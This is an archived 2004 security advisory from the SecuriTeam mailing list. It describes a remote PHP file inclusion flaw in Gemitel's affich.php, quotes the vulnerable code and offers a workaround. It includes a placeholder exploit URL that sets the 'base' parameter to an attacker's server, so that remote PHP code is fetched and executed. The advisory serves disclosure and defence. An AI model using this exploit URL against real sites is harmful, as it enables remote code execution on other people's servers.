[UNIX] Gimtel File Inclusion Vulnerability

• Previous message: SecuriTeam: "[UNIX] Citadel/UX Local Permissions Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 18 Apr 2004 17:30:23 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Gimtel File Inclusion Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://www.isesam.com/> Gemitel is "a free software written in PHP that
allows to manage micro payments like allopass, mediapaiement,
optelo-Sponsup or Rentabiliweb". A vulnerability in the product allows
remote attackers to include external PHP files, followed by their
execution by the web server.

DETAILS

Vulnerable Systems:
 * Gemitel version 3 build 50

Vulnerable code:
In the file /html/affich.php, the following code can be seen:
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");

This means that we can tell (by modifying the $base value) the PHP
interpreter to include a file that reside outside the server (i.e. on our
server), and get that file executed under the privileges of the PHP
interpreter.

Exploit:
Using the following URL: http://[vulnerable host]/[Gemitel
folder]/html/affich.php?base=http://[your server]/ you can test whether
you server is vulnerable.

Temporary workaround:
Replace:
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");

With:
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
if(file_exists($f_inc)){require("$f_inc");}
//require("sp-turn.php");

ADDITIONAL INFORMATION

The information has been provided by <mailto:webmaster@wulab.com> jaguar.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Citadel/UX Local Permissions Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]